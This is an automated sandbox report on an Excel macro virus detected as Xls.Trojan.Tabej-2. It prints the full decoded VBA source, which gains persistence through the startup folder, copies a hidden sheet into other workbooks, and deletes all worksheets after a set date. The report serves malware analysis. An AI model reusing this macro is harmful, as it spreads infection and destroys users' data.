MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The presence of Auto_Open and Auto_Close VBA macros, along with ClamAV detections for 'Xls.Trojan.Tabej-2', strongly indicates malicious intent. The Auto_Open macro attempts to save a copy of itself as 'tabej.xls' in the startup path, suggesting an attempt at persistence. The Auto_Close macro also contains logic that could be used for cleanup or further execution.
Heuristics 4
-
ClamAV: Xls.Trojan.Tabej-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Tabej-2
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1771 bytes |
SHA-256: b6164b7b7862400fad982a538d45ecdded47bbe7076789dfed776b06d34e4b56 |
|||
|
Detection
ClamAV:
Xls.Trojan.Tabej-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "tabej"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = ""
If Windows(1).Caption = "tabej.xls" Then Workbooks.Add
s$ = Application.StartupPath & "\" & "tabej.xls"
d$ = Dir(s$)
If Not d$ = "tabej.xls" Then rx
Application.OnSheetActivate = "inf"
End Sub
Sub rx()
Attribute rx.VB_ProcData.VB_Invoke_Func = " \n14"
Application.ScreenUpdating = False
cd$ = CurDir()
ChDir Application.StartupPath
ActiveWorkbook.SaveAs filename:=Application.StartupPath & "/" & "tabej.xls"
ActiveWindow.Visible = False
ChDir cd$
Application.ScreenUpdating = True
End Sub
Sub inf()
Attribute inf.VB_ProcData.VB_Invoke_Func = " \n14"
dt = CSng(Date)
For x = 1 To ActiveWorkbook.Sheets.Count
If ActiveWorkbook.Sheets(x).Name = "tabej" Then
If ActiveWorkbook.Name <> ThisWorkbook.Name Then
If dt > 36016 Then
Application.DisplayAlerts = False
ActiveWorkbook.Sheets("tabej").Delete
Exit Sub
Application.DisplayAlerts = True
End If
End If
Exit Sub
End If
Next
Application.ScreenUpdating = False
ThisWorkbook.Sheets("tabej").Copy before:=ActiveWorkbook.Sheets(1)
ActiveWorkbook.Sheets("tabej").Visible = False
Application.ScreenUpdating = True
End Sub
Sub auto_close()
Attribute auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
dt = CSng(Date)
If Not ActiveWorkbook Is Nothing Then
If dt > 36015 Then
If Worksheets.Count > 0 Then
Application.ScreenUpdating = False
Application.DisplayAlerts = False
Worksheets.Add.Move after:=Worksheets(Worksheets.Count)
For x = 1 To Worksheets.Count - 1
Worksheets(1).Delete
Next
ThisWorkbook.Save
End If
End If
End If
Application.DisplayAlerts = True
If ThisWorkbook.Name = "tabej" Then Application.OnSheetActivate = ""
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.